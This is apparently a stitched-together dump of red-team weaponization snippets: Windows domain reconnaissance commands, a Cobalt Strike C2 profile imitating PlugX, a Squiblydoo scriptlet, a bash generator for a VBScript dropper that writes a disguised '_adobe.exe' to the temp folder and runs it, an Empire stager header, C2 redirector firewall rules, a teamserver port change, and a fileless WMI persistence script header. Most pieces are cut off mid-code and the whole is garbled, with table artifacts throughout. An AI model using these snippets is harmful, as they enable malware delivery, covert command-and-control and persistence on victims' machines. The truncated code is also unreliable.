echo %LOGONSERVER%
net view /DOMAIN:domain
# | |
# PlugX Profile | |
# Author: @infosecn1nja | |
# | |
# https://github.com/silence-is-best/c2db/blob/master/README.md | |
set sleeptime "30000"; # use a ~30s delay between callbacks | |
set jitter "10"; # throw in a 10% jitter | |
stage { |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
#!/bin/bash | |
convert2hex=$(xxd -p $1) | |
result=$(echo $convert2hex | sed s'/ //g') | |
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)' |
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'wmic_xsl_starfighters', | |
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'], |
#!/usr/bin/python | |
import argparse | |
import re, random | |
import string, os, os.path | |
def rand_num(min, max):
    """Return a pseudo-random integer in the half-open range [min, max).

    Draws from the module-level PRNG (Mersenne Twister), so it is not a
    cryptographically secure source -- unlike gen_str, which uses
    random.SystemRandom.  Raises ValueError when max <= min, exactly as
    random.randrange does.  Note that the parameter names shadow the
    builtins min() and max() inside this function.
    """
    # randint's upper bound is inclusive, so max - 1 keeps max exclusive.
    return random.randint(min, max - 1)
def gen_str(size):
    """Return a string of ``size`` random ASCII letters (upper and lower case).

    Letters are chosen with random.SystemRandom, i.e. from the operating
    system's entropy source rather than the seedable module-level PRNG.
    A size of zero or less yields the empty string.
    """
    secure_rng = random.SystemRandom()
    alphabet = string.ascii_uppercase + string.ascii_lowercase
    picked = [secure_rng.choice(alphabet) for _ in range(size)]
    return "".join(picked)
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
/// <summary>
/// Parameterless constructor; intentionally performs no initialization.
/// </summary>
public TestClass()
{}
Make a rule that allows port 80/443 access only from the redirector (iptables appends rules in order, so each ACCEPT for the redirector must be added before the matching catch-all DROP):
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 443 -j DROP | |
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT | |
iptables -A INPUT -p tcp --dport 80 -j DROP | |
Change the teamserver's default port:
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver |
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime) | |
# https://wikileaks.org/ciav7p1/cms/page_14587908.html | |
<# | |
.SYNOPSIS | |
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once. | |
#> | |
$EventFilterName = "Fileless WMI Persistence SystemUptime" |
APT Group/Red Team Weaponization Phase | |
======================================= | |
C2 tools:
- Cobalt Strike | |
- Empire | |
- PoshC2 | |
- PupyRAT | |
- Metasploit |